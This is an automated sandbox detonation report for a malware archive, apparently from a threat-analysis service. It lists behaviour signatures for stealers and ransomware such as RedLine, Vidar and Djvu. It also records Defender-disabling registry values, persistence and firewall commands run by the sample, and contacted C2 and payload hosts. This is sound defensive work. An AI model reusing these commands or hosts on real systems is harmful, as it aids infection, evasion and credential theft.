Analysis Overview
SHA256
fc3e5b6b9d97afe0e0ad865e5b625c20b2fbf65bef4c46213b9abf941798303d
Threat Level: Known bad
The file faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.7z was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Win32/Colibri Loader Activity M2
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
Djvu Ransomware
PrivateLoader
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata: ET MALWARE Amadey CnC Check-In
Modifies visiblity of hidden/system files in Explorer
Glupteba
Modifies visibility of file extensions in Explorer
Process spawned unexpected child process
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
RedLine Payload
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
Amadey
Colibri Loader
suricata: ET MALWARE Win32/Colibri Loader Activity M3
suricata: ET MALWARE Win32/Colibri Loader Activity
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
RedLine
Suspicious use of NtCreateUserProcessOtherParentProcess
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Generic gate .php GET with minimal headers
Detected Djvu ransomware
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
Vidar
Vidar Stealer
Blocklisted process makes network request
Downloads MZ/PE file
Modifies Windows Firewall
Executes dropped EXE
UPX packed file
Reads user/profile data of web browsers
Checks computer location settings
Reads local data of messenger clients
Uses the VBS compiler for execution
Reads user/profile data of local email clients
Checks BIOS information in registry
Loads dropped DLL
Modifies file permissions
Adds Run key to start application
Accesses 2FA software files, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Accesses Microsoft Outlook profiles
Checks installed software on the system
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Launches sc.exe
Detects Pyinstaller
Enumerates physical storage devices
Program crash
Modifies system certificate store
Script User-Agent
Suspicious use of UnmapMainImage
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Checks SCSI registry key(s)
Suspicious behavior: AddClipboardFormatListener
Runs ping.exe
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Enumerates processes with tasklist
Suspicious use of WriteProcessMemory
outlook_win_path
Modifies data under HKEY_USERS
Modifies Internet Explorer settings
Delays execution with timeout.exe
Suspicious behavior: MapViewOfSection
Suspicious use of SendNotifyMessage
Kills process with taskkill
Modifies registry class
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Views/modifies file attributes
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-07-05 10:59
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-07-05 10:59
Reported
2022-07-05 11:06
Platform
win7-20220414-en
Max time kernel
157s
Max time network
393s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
PrivateLoader
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Vidar
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2024 set thread context of 1440 | N/A | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"
C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2fc
C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe
"C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe"
C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe
"C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe"
C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe
"C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe"
C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
"C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe"
C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
"C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe"
C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe
"C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe"
C:\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe
"C:\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe"
C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe
"C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe"
C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
"C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe"
C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe
"C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe"
C:\Windows\SysWOW64\attrib.exe
attrib -?
C:\Users\Admin\Pictures\Adobe Films\eeMXA1PvRwQEPGdOiDQDaBjy.exe
"C:\Users\Admin\Pictures\Adobe Films\eeMXA1PvRwQEPGdOiDQDaBjy.exe"
C:\Users\Admin\Pictures\Adobe Films\Ykfki98dvb3qPmhwtgmBv31L.exe
"C:\Users\Admin\Pictures\Adobe Films\Ykfki98dvb3qPmhwtgmBv31L.exe"
C:\Users\Admin\Pictures\Adobe Films\f1deYbzXiXvkh0j_e5Nz8E7D.exe
"C:\Users\Admin\Pictures\Adobe Films\f1deYbzXiXvkh0j_e5Nz8E7D.exe"
C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe
"C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe
"C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Inebriarti.htm & ping -n 5 localhost
C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
C:\Users\Admin\Pictures\Adobe Films\LEhUV4Bu2jo02_gBtm4NyWn4.exe
"C:\Users\Admin\Pictures\Adobe Films\LEhUV4Bu2jo02_gBtm4NyWn4.exe"
C:\Users\Admin\Pictures\Adobe Films\ed8OaHBYObpsBB72qmS5fqYf.exe
"C:\Users\Admin\Pictures\Adobe Films\ed8OaHBYObpsBB72qmS5fqYf.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SETUP_~2.EXE
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SETUP_~2.EXE
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tal.exe.pif
Tal.exe.pif H
C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220705110445.log C:\Windows\Logs\CBS\CbsPersist_20220705110445.cab
C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
"C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
"C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| US | 193.233.185.125:80 | tcp | |
| US | 193.233.185.125:80 | tcp | |
| US | 193.233.185.125:80 | tcp | |
| US | 193.233.185.125:80 | tcp | |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | maper.info | udp |
| US | 8.8.8.8:53 | fdhjtnthdngnd.click | udp |
| DE | 148.251.234.93:80 | maper.info | tcp |
| US | 188.114.96.0:80 | fdhjtnthdngnd.click | tcp |
| US | 8.8.8.8:53 | fantadentalperu.com | udp |
| US | 8.8.8.8:53 | timetogof.at | udp |
| US | 8.8.8.8:53 | iranparsa-novin.com | udp |
| IR | 185.88.178.71:80 | iranparsa-novin.com | tcp |
| KR | 211.119.84.112:80 | timetogof.at | tcp |
| CA | 192.99.207.151:80 | fantadentalperu.com | tcp |
| RU | 185.106.93.10:80 | 185.106.93.10 | tcp |
| SC | 185.215.113.15:80 | 185.215.113.15 | tcp |
| RU | 193.106.191.246:80 | 193.106.191.246 | tcp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 2.56.57.65:80 | 2.56.57.65 | tcp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| KR | 211.119.84.112:80 | timetogof.at | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| CA | 192.99.207.151:80 | fantadentalperu.com | tcp |
| IR | 185.88.178.71:80 | iranparsa-novin.com | tcp |
| US | 188.114.96.0:443 | fdhjtnthdngnd.click | tcp |
| DE | 148.251.234.93:80 | maper.info | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| DE | 148.251.234.93:80 | maper.info | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| DE | 148.251.234.93:80 | maper.info | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| DE | 148.251.234.93:443 | maper.info | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| DE | 148.251.234.93:443 | maper.info | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| IR | 185.88.178.71:80 | iranparsa-novin.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| CA | 192.99.207.151:80 | fantadentalperu.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| DE | 148.251.234.93:443 | maper.info | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| DE | 148.251.234.93:443 | maper.info | tcp |
| IR | 185.88.178.71:80 | iranparsa-novin.com | tcp |
| IR | 185.88.178.71:443 | iranparsa-novin.com | tcp |
| CA | 192.99.207.151:80 | fantadentalperu.com | tcp |
| US | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| CA | 192.99.207.151:443 | fantadentalperu.com | tcp |
| IR | 185.88.178.71:443 | iranparsa-novin.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| IR | 185.88.178.71:443 | iranparsa-novin.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| NL | 104.110.191.201:80 | apps.identrust.com | tcp |
| IR | 185.88.178.71:443 | iranparsa-novin.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | telegram.org | udp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | yandex.ru | udp |
| RU | 5.255.255.77:443 | yandex.ru | tcp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | checkip.amazonaws.com | udp |
| IE | 52.17.214.221:80 | checkip.amazonaws.com | tcp |
| NL | 85.202.169.116:80 | 85.202.169.116 | tcp |
| US | 8.8.8.8:53 | cnSrufvjrfjAHpXtGtICmuqBsaZF.cnSrufvjrfjAHpXtGtICmuqBsaZF | udp |
| RU | 193.106.191.81:23196 | tcp | |
| UA | 194.36.177.84:19999 | tcp | |
| US | 8.8.8.8:53 | ushatamaiet.xyz | udp |
| LV | 94.140.112.166:80 | ushatamaiet.xyz | tcp |
| US | 8.8.8.8:53 | 4hmn.short.gy | udp |
| DE | 18.184.197.212:443 | 4hmn.short.gy | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| US | 8.8.8.8:53 | jollygiunco.com | udp |
| IT | 31.11.32.193:443 | jollygiunco.com | tcp |
